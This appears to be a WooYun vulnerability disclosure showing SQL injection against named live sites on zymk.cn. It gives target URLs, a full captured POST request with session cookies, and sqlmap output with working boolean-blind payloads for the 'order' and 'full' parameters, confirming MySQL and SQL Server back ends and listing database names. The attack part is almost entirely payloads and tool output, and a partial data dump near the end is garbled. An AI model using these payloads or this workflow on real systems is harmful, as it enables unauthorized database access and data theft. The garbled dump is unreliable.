WooYun.org

http://shop.zymk.cn/index.php/Tag/?id=2&order=listorder

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: order (GET)
    Type: boolean-based blind
    Title: MySQL >= 5.0 boolean-based blind - Parameter replace
    Payload: id=2&order=(SELECT (CASE WHEN (1825=1825) THEN 1825 ELSE 1825*(SELECT 1825 FROM INFORMA
TION_SCHEMA.CHARACTER_SETS) END))
---
[13:31:54] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0
[13:31:54] [INFO] fetching database names
[13:31:54] [INFO] fetching number of databases
[13:31:54] [INFO] resumed: 2
[13:31:54] [INFO] resumed: information_schema
[13:31:54] [INFO] resumed: mkshop
available databases [2]:
[*] information_schema
[*] mkshop

http://baike.zymk.cn/index.php?search-fulltext-title-1--all-0-within-time-desc-1

POST /index.php?search-default HTTP/1.1
Host: baike.zymk.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://baike.zymk.cn/index.php?doc-create.html
Cookie: BAIDU_DUP_lcr=http://www.baidu.com/link?url=Zjo417Xo1rTTvkH3nz19eSONwF-7YiqRO6ytC3XN6Ma&wd=&eqid=81757fa0000926ad00000005563444e9; Hm_lvt_bfeb001eb5a0b3162d945f1b9cdcb912=1446266096; Hm_lpvt_bfeb001eb5a0b3162d945f1b9cdcb912=1446269195; FX7m_3f67_saltkey=w4hcq4U3; FX7m_3f67_lastvisit=1446263008; FX7m_3f67_sid=y769HA; FX7m_3f67_lastact=1446268181%09misc.php%09seccode; FX7m_3f67_st_p=0%7C1446268175%7C4040132a2da2b28facae50f5f3ec46ac; FX7m_3f67_visitedfid=47D299D5472; FX7m_3f67_viewid=tid_596946; FX7m_3f67_seccode=6324.ec5df85813cf7859f6; TP_think_language=%22zh-CN%22; hd_sid=NkVt0X; hd_searchtime=1446267013; CNZZDATA1789733=cnzz_eid%3D1206615900-1446266704-%26ntime%3D1446266704; FX7m_3f67_home_readfeed=1446268160; FX7m_3f67_nofocus_home=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 19
searchtext=1&full=1

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: full (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: searchtext=1&full=1 AND 2105=2105
---
[13:35:35] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: PHP 5.2.17
back-end DBMS: Microsoft SQL Server 2008
[13:35:35] [INFO] fetching database names
[13:35:35] [INFO] fetching number of databases
[13:35:35] [INFO] resumed: 4411
[13:35:35] [INFO] resuming partial value: #\x13\x12\x12\n\tEE%##\x13\x12\x12\n\n\n\nER\tIEE%###\x13\
x12\x12\n\n\tIF\tEE%%E%%%#\x13\x13\x12\x12\x12\x12\n\tIEEE%%#%%#####%%#%#####\x13\x13\x12\x13\x13\x1
3\x13\x12\x12\x12\x12\x12\n\x12\x12\x12\x13%##%EE%&\n\nIEE%##\x13\x13\x12\x13\x12\n\tIEE%##\x14\x13\
x12\x12\n\tIEE%%##\x13\x13\x12\x12\n\n\tIIEE%##\x13\x12\x12\n\tE%%####\x13\x12\n\tIIEEE%#\x13\x12\x1
2\n\tEEE%##\x12\x12\x13\x13%IIEEEEE%%IM%E%#%#\x13\x13\x12\x12\x12\n\n\tIIK\x13\x12\x12\x12###\x13\x1
3#\x13\x13\x13\x12\x12\x12\tJ\tJ\x13*\n\n\tIIEEEIIEE%#\x13\x12\x12\n\tIIIE%E%#c#\x13E%##\x13\x12\x12
\x12\n\n\tIE%%%%###\x13\x12\x12\x12\n\n\tIEE##\x13\x13\x13\x13\x12\x12\x12\n\tIEE%#%"\x13\x13\x12\n\
tR\tEE#
[13:35:35] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' fo
r faster data retrieval
[13:35:35] [INFO] retrieved: